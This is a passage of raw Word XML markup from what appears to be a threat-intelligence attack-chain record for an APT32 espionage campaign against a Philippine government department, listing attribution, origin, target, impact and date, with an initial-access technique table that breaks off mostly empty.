        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A266BD" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="00387DCC" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00015243" w:rsidRPr="00B857D7" w14:paraId="4573C7BB" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72530598" w14:textId="77777777" w:rsidR="00015243" w:rsidRDefault="00015243" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760A810A" w14:textId="05C22036" w:rsidR="00015243" w:rsidRDefault="00015243" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C056156" w14:textId="77777777" w:rsidR="00015243" w:rsidRPr="00387DCC" w:rsidRDefault="00015243" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="1B5EFD27" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A5F8C5F" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="007328DE" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E98D894" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="007328DE" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">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18B964DC" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="00387DCC" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="1A8B9DE7" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2622819C" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D2F93E" w14:textId="212FD5C5" w:rsidR="0059419E" w:rsidRPr="007328DE" w:rsidRDefault="00EE0D23" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vietnam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB08282" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="00387DCC" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="1926D5D8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79357750" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132F3472" w14:textId="7A11F3E7" w:rsidR="0059419E" w:rsidRDefault="002E0ED2" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Philippines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14FBC0F9" w14:textId="675C7BE5" w:rsidR="0059419E" w:rsidRPr="00387DCC" w:rsidRDefault="002E0ED2" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="4F589602" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E67A97" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F9B266" w14:textId="53EC465A" w:rsidR="0059419E" w:rsidRDefault="002E0ED2" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="633DA7BB" w14:textId="4B64CDCF" w:rsidR="0059419E" w:rsidRPr="00387DCC" w:rsidRDefault="002E0ED2" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="4C691932" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="147F9E33" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EE4CB56" w14:textId="643F81B2" w:rsidR="0059419E" w:rsidRDefault="00EB0610" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A59A704" w14:textId="5A9D8916" w:rsidR="0059419E" w:rsidRDefault="00EB0610" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r>
              <w:t>Cybereason concluded the main motivation behind the attack was cyber espionage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="017FE1B6" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76F87DB6" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35FB9432" w14:textId="5EFB64CF" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F711D5B" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="1C3B8E6F" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2202B8B1" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D743345" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DDFC2A8" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="373888F8" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="242381C1" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01358057" w14:textId="155759A4" w:rsidR="00873778" w:rsidRDefault="00CC0028" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C89380F"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56FBFA38" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EEB584E" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A76360" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319C5F2C" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059419E" w:rsidRPr="00B857D7" w14:paraId="40DA838B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33D40547" w14:textId="6BCD49EF" w:rsidR="0059419E" w:rsidRDefault="00CF3A29" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67DB3D2C" w14:textId="4A44B1DD" w:rsidR="0059419E" w:rsidRDefault="00CF3A29" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60C6ACA8" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF3A29" w:rsidRPr="00B857D7" w14:paraId="512D6B2D" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BA3237" w14:textId="77777777" w:rsidR="00CF3A29" w:rsidRDefault="00CF3A29" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42253C0D" w14:textId="77777777" w:rsidR="00CF3A29" w:rsidRDefault="00CF3A29" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297D90EC" w14:textId="77777777" w:rsidR="00CF3A29" w:rsidRDefault="00CF3A29" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19F55586" w14:textId="5CC91124" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E"/>
    <w:p w14:paraId="73DEA9FA" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10343" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="2541"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w14:paraId="7DC36081" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="402BD3C8" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6C687226" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7DF01B7B" w14:textId="25271C14" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT32_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7F5B2B4D" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7D0E7E8D" w14:textId="75264C4E" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="283DBE55" w14:textId="78BF94A5" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="67991F48" w14:textId="782EC236" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7852062A" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w14:paraId="39A061E8" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5A40C1" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60730ABF" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38702B09" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="422FD674" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7487F119" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="002D1D50" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
